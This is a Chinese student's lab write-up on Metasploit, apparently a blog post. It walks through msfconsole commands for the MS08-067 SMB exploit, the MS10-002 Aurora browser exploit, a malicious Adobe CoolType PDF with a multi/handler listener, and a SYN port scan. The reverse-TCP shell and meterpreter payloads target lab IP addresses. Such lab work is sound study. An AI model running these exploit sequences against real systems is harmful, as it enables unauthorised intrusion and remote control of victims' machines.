标签:结果 PDF文件 很多 学习 png 环境 erp ret 使用命令
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
search ms08_067
查询针对该漏洞的攻击模块:use exploit/windows/smb/ms08_067_netapi
使用该模块show payloads
会显示出有效的攻击载荷:set payload generic/shell_reverse_tcp
设置攻击有效载荷set LHOST 192.168.152.130
, set RHOST 192.168.152.131
show options
查看payload状态:exploit
开始攻击,攻击成功(若攻击失败,则需要关闭XP的防火墙):ipconfig/all
:ipconfig/all
:search ms10_002
指令查看可以运用的攻击模块。use windows/browser/ms10_002_aurora
模块。info
查看该模块的信息:set payload windows/meterpreter/reverse_tcp
设置payload,并设置需要设置的参数。show options
确认需要设置的参数是否已经设置好:exploit
指令开始攻击,攻击成功后会有靶机需要访问的网址:sessions -i 1
,成功获取靶机的shell
,可以对其进行操作:use exploit/windows/fileformat/adobe_cooltype_sing
进入模块。set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷,并设置相关数据:exploit
,生成pdf文件
,并可以看到pdf所在文件夹,将pdf复制到靶机里:use exploit/multi/handler
新建监听模块:sysinfo
,攻击成功:show auxiliary
查看所有辅助模块,并从中选择一个。我使用的是scanner/portscan/syn
。它是通过发送TCP SYN
标志的方式来探测开放的端口。show options
查看配置,并进行相关配置:run
,发现扫描开放端口成功:实战的话还需要结合靶机的环境去考虑。
这次实验再次能够看出msf是一个比较全面的工具,但渗透的局限性也比较明显。由于前几天在准备考试,这次实验完成得比较晚,但在其他同学的帮助下完成速度还是比较快的,毕竟比他们少走了很多弯路。而且这次又从其他角度成功地进行了攻击,学习到了不少新的东西,美滋滋:D。
标签:结果 PDF文件 很多 学习 png 环境 erp ret 使用命令
原文地址:https://www.cnblogs.com/yangdi0420/p/8947413.html